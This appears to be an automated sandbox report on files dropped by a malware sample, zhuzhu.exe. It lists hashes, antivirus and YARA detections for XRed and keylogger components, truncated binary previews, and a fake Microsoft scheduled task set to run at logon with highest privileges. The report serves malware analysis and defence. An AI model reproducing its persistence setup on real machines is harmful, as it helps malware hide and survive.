                                                                                                                                                                    SHA-256:E7EEA4D33322EE2A7B518A7628591B813CADBBB3E9223C1B371356F397512CDF
                                                                                                                                                                    SHA-512:4FAA871DC264C3C97F64AF92693501E1CD949B5E39114788340F323073247212B55DE539A39E2A62483AD557933335E22F27EF9747524FA5062A189A926A5CE1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.8.0.<./.P.i.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERD15.tmp.xml

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4572
                                                                                                                                                                    Entropy (8bit):4.439458351406917
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cvIwWl8zsIJg77aI9OJWpW8VYGYm8M4JFCFx+q840TR2Z3d:uIjfOI7Y47VSJkCt2Z3d
                                                                                                                                                                    MD5:6D68AD6C735D7BBD82FFE14F479C2B3D
                                                                                                                                                                    SHA1:F806E9DA51E36BED9DCD7D02CE85C8A63274911A
                                                                                                                                                                    SHA-256:22762043A4AE11D81D953F60C7EC34EC23190877CEC3DF9F4F3A45993DE57ABB
                                                                                                                                                                    SHA-512:FED4C04184E18C7149EE95D8FD84EE6FE00A757A6FC8B03A3A2E3580DC30063B9AFE061688F145DCF855C80CB033A7135F6D14072686EEE7935D333BD5F04A4A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653462" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE076.tmp.WERInternalMetadata.xml

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6318
                                                                                                                                                                    Entropy (8bit):3.7147503597477587
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:R6l7wVeJVxK6JAeYiSNbprE89bIdsfPYm:R6lXJG6XYlnIWfV
                                                                                                                                                                    MD5:3DB61FBC41D8034B5B338AE2EC43B3CF
                                                                                                                                                                    SHA1:F742A3632A7752865F1E37FAB9CD57561F39D259
                                                                                                                                                                    SHA-256:F8ACA9BE36E540B6A2B6D28CDC89E46282C1AA60E572BD75F9990821A1356607
                                                                                                                                                                    SHA-512:4F1E88B1F44BC7E195115942DA70A885E927133798456CEC48F8F2D4615D5ED899E0305EB32C413F05006360FFE473374E6BF9542D4F1B83FB18465C09C40004
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.8.0.<./.P.i.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE096.tmp.xml

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4572
                                                                                                                                                                    Entropy (8bit):4.441261713228417
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cvIwWl8zsIJg77aI9OJWpW8VYrYm8M4JFbFn+q845TR2Z3d:uIjfOI7Y47V3J7Lt2Z3d
                                                                                                                                                                    MD5:EDD9F542C202E3AA9B57702B955C608D
                                                                                                                                                                    SHA1:0CEE4B9B20483F6AC2CE3D20B26CD14F172D5820
                                                                                                                                                                    SHA-256:37A10D1A3140D3D37F304620063FBFAD165A5B80C40159C2D3A385160E759753
                                                                                                                                                                    SHA-512:2CE4E10B09930B4A007A29A173D812F93F3D86A219056DA2B034718B2E5EED1EEC1719FFC2DADBB51B6E54DBB0856F9A8DEDD705F0831B06C14AEDC6D0BA4E5E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653462" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF4A.tmp.dmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 04:00:08 2024, 0x1205a4 type
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4028232
                                                                                                                                                                    Entropy (8bit):2.3021504157883053
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:O5saXsQa2NNhFGJxAwZy0xH1EZEO8g7gSsTsiq2:O5shQxNeyi1t
                                                                                                                                                                    MD5:432EDDE0D89D62355791E4FC936479B8
                                                                                                                                                                    SHA1:B0AD09BE65376B8A1EAEE5E1A52145176A9DFB89
                                                                                                                                                                    SHA-256:DE87A384FCA6D88A0412A0A47DAD7227FED98506361D38A742AD941CD5C8D002
                                                                                                                                                                    SHA-512:9DBFE7651C23F61E480561637EB666FC6AB586E8146FDB4BBECE28F27E86C8B9893450DEB4E2026DF88E52CD649CFAB30572354D0F7A007D79C50AC6E8EA6FAD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:MDMP..a..... .........rg.............U...............\......$...p|......................`.......8...........T...............@.;..........|...........~..............................................................................eJ..............GenuineIntel............T.............rg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\ProgramData\Synaptics\RCXE77E.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\zhuzhu.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):771584
                                                                                                                                                                    Entropy (8bit):6.641700569488142
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IAr:ansJ39LyjbJkQFMhmC+6GD9/
                                                                                                                                                                    MD5:382B0F88502E718DFDF96DBC3AA3400A
                                                                                                                                                                    SHA1:7A3922C6DE7B42483E48644C917ADA5467FD1A44
                                                                                                                                                                    SHA-256:F2927C106573A6D3594AD58A3B5976C9E82964BF4D064821ABE4D3D58EF82479
                                                                                                                                                                    SHA-512:D6F0094332CE7D2C6CBC46B41EA71871DFDB9148F5C5E1C96C8F79E752543A59B6EF85FF6B26148A2ADBB605792392221383624087987BE280DC625A66048E78
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXE77E.tmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXE77E.tmp, Author: Joe Security
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                    C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\zhuzhu.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6061056
                                                                                                                                                                    Entropy (8bit):7.174885705168195
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:unsmtk2asgF0ET9HlrxRVwJMACNiREvBvlvwvCvxvD:wL8Z9HhxRVwJMAqoetRqA9D
                                                                                                                                                                    MD5:675F03DB23D403573A3A6F708A0E4369
                                                                                                                                                                    SHA1:78EE9AFAFE6BF18D2C42D816629B6F9ED1E3EA2F
                                                                                                                                                                    SHA-256:EE4C8A187E1E1BD62ABE49FAECE1F327DC7718C736DD1E427C025D73FA796CF8
                                                                                                                                                                    SHA-512:C9055873FCBCEFD7AEB8414627D4AA7645014BC2A609A4993317A45465A2FFDBEB38DBFB6C7677350203FE1E7D1F3906FC670AE74D1A75FBD91533044F513240
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*......................R...................@...........................\..................@..............................B*......H.Q..................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...H.Q.......Q.................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                    C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\zhuzhu.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\inst[1].exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\._cache_zhuzhu.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4118496
                                                                                                                                                                    Entropy (8bit):7.743814085153487
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:9lBo/r7J2a4FL8VdL0hvADfHraEk1qhJonrnYmIb:1oD7x4yVdDfLa8ky
                                                                                                                                                                    MD5:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                    SHA1:6B5F9A7B71E6B105D1BFA26B0C7A4931ED9E5179
                                                                                                                                                                    SHA-256:B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
                                                                                                                                                                    SHA-512:D584D30083E34964D846C88EB558DBA338E3B8982D6D71EFEC36461AEA12127CFCBA2BE9510D9EF254A85680A2BA2DDB21583CE5E77D5CF3AC0A65800E5AB25A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                    • Filename: QQyisSetups64.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: wyySetups64.exe, Detection: malicious, Browse
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!..e..e..e....A.a..l.B.y..Bb..d..l.^.s..{.S.a..Bb..f..Bb..@..e.....l.T...l.S...{.C.d..l.F.d..Riche..................PE..L...,D.f......................2...................@...........................?......?...@.....................................|.......l</...........>.H)...@>.h...@...................................@............................................text............................... ..`.rdata...M.......N..................@..@.data...L....0......................@....rsrc...l</......>/.................@..@.reloc..(....@>.......=.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:@...e...........................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\PolicyManagement.xml

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1893
                                                                                                                                                                    Entropy (8bit):5.212287775015203
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                                                                                                                                    MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                                                                                                                                    SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                                                                                                                                    SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                                                                                                                                    SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\!@t2F16.tmp (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 648 bytes, 1 file, at 0x2c +A "setup.ini", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):648
                                                                                                                                                                    Entropy (8bit):7.46325903759004
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:wztrG9cLEvuu0zPphueB3phrHtFGW4RJlXi2BzbtQ4F2k5xcGKB5bDHKq:wfLE2FzR8eB3phRkXZzbtL2yxcGabDqq
                                                                                                                                                                    MD5:DCF8A1E58C81782DC11CFF675B105B63
                                                                                                                                                                    SHA1:08D4821471E445965CAEAD5093AF44460CD74B92
                                                                                                                                                                    SHA-256:034283B5FA8C86E481E4B927A234A7A83533B42B851E0924E48BE77032182F27
                                                                                                                                                                    SHA-512:E36E9AA8278BF2055A5F16991F05B3329A404EF025A132A6E42AAEAB65E0BD05A43BE0E0829B54F7ECC95F8F2B6F82D32D08BD32F15600AF3B52B6372CC51E04
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:MSCF............,...................F.......V..........YvT .setup.ini....C:.V.CKeQ..A..7.?......jQO...3..AB'i3.N:t.0..GnD...K....`.0.g...{..U..*`..i..eY.5.U}v.^..}{.-....r..O..U{..d~_..'.v;...........,.EY.....&.....]]-...g._.eqq[.+.W.z.....?.|.....]o......~N...B...,^.].iw.....z}{.6....'..).Y..2P..]..(&kZ.!..2o.=... ..y..!..It.P....HTL.K..]....<...E...|.....?.>.....Bg.......o.M...ud......1..B..#P..'......3N......G.].....y4.......g.j}c...9..w..G....A....z...*.8..F/.s:..4U.....\Z..1.....{O"...Io..(.0.P:...BJ.<..::..x$*#...NF.<..F.`...E.r.L ..9KS .r..5..-b".h~[.1...dIa..ia...s...Az...W.Y.-...H.q.......<...`....0@J.....

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\!@t2F16.tmp.P2P

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 648 bytes, 1 file, at 0x2c +A "setup.ini", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):648
                                                                                                                                                                    Entropy (8bit):7.46325903759004
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:wztrG9cLEvuu0zPphueB3phrHtFGW4RJlXi2BzbtQ4F2k5xcGKB5bDHKq:wfLE2FzR8eB3phRkXZzbtL2yxcGabDqq
                                                                                                                                                                    MD5:DCF8A1E58C81782DC11CFF675B105B63
                                                                                                                                                                    SHA1:08D4821471E445965CAEAD5093AF44460CD74B92
                                                                                                                                                                    SHA-256:034283B5FA8C86E481E4B927A234A7A83533B42B851E0924E48BE77032182F27
                                                                                                                                                                    SHA-512:E36E9AA8278BF2055A5F16991F05B3329A404EF025A132A6E42AAEAB65E0BD05A43BE0E0829B54F7ECC95F8F2B6F82D32D08BD32F15600AF3B52B6372CC51E04
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:MSCF............,...................F.......V..........YvT .setup.ini....C:.V.CKeQ..A..7.?......jQO...3..AB'i3.N:t.0..GnD...K....`.0.g...{..U..*`..i..eY.5.U}v.^..}{.-....r..O..U{..d~_..'.v;...........,.EY.....&.....]]-...g._.eqq[.+.W.z.....?.|.....]o......~N...B...,^.].iw.....z}{.6....'..).Y..2P..]..(&kZ.!..2o.=... ..y..!..It.P....HTL.K..]....<...E...|.....?.>.....Bg.......o.M...ud......1..B..#P..'......3N......G.].....y4.......g.j}c...9..w..G....A....z...*.8..F/.s:..4U.....\Z..1.....{O"...Io..(.0.P:...BJ.<..::..x$*#...NF.<..F.`...E.r.L ..9KS .r..5..-b".h~[.1...dIa..ia...s...Az...W.Y.-...H.q.......<...`....0@J.....

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\!@t2F16.tmp.dir\setup.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:Generic INItialization configuration [360Safe]
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):854
                                                                                                                                                                    Entropy (8bit):5.54815735280418
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:9QQ08ETkByYcqQZLTvOIuAALne2toBFjlVH:9QUETacqQJWIdAzxtonlV
                                                                                                                                                                    MD5:CB13859BCE5ADF79C6B2E1C4601FA06A
                                                                                                                                                                    SHA1:5562D46E7FBD8A3FF92AFE2270B23F5E73FF45D7
                                                                                                                                                                    SHA-256:601CFCA4A7123503331D7641666F7F48164AEB2494B007ECE4C8880F51AF6E2D
                                                                                                                                                                    SHA-512:C355FAE3C70B875A08F4BA8BC7D9463D5DB686D2113970F0ED17A5D723DA2ADF82334AFAF3345AABB51A2A89873C15926341AA18D90FF374FA1FB68B82BF3AC4
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:[360Installer]..SlideShowResourceURL=http://down.360safe.com/360safe/slideshow_new.cab..From=h_inst..Product=360Safe....[360Safe]..Name=360........Pid=h_inst..FID=setup_13.0.0.2008k..Version=13.0.0.2009..RegVersionFile=360Ver.dll..IsBeta=0..Urls=pdown://b2=100027000|p2=B0A12507C5F7FB22D8E1EB5B2682074BD0218EF0|p3=20|p7=15|c2=1|b5=360......|b6=........|b7=5|b9=1|http://dl.360safe.com/setup_13.0.0.2008k.exe..MD5FileID=E901BD5EEF684DD36520382E5FC26236..SetupParam=/pid=h_inst /noreboot=1 /installer=1 /S..SlideShowImage=360safe_1.png,360safe_2.png,360safe_3.png,....[360signdata]..sign=0100000094BB9E7DD93895D39142938A10B443920CBE15CC1E5C20E47CA37526F047D27B4EE9567798C27E09EB3C005E187E0CE1A9B7EA4C2DA5D92120A8B6ABEBF270462455BBA3FD1AA5ACE5C44196EF1083BB9FAEDAD4C74F82DEFB96A173B5519816D7C03F06C87BAC684A0CF6FB459E487DCDEF38C3AF0864CB102E42D0FF3412A0

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\!@t2F16.tmp.mem

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):17
                                                                                                                                                                    Entropy (8bit):2.409267252251469
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:lsS+n:U
                                                                                                                                                                    MD5:983514E15961BFDA71A616E3CA412147
                                                                                                                                                                    SHA1:8A938B2349A33CB8A45975F5E1084AC4ED702C72
                                                                                                                                                                    SHA-256:D22207FA67A53E84F79BEB0C103430CCAC7A6D6EEC028262135DDE91079F5566
                                                                                                                                                                    SHA-512:2C3D100D47A806CCB23F9ABCE816869C80B21EF6B6479C5A7BDEE47F9B14FCD004EE99F30ECC39A60AE35B1ADB0D4DAC52E58DABDB1885940A8888AC1E61B60E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1NDuEzX.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.270787698355859
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0BvSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+yv+pAZewRDK4mW
                                                                                                                                                                    MD5:88C0E33BC5E2509956CD2C1311F82BF5
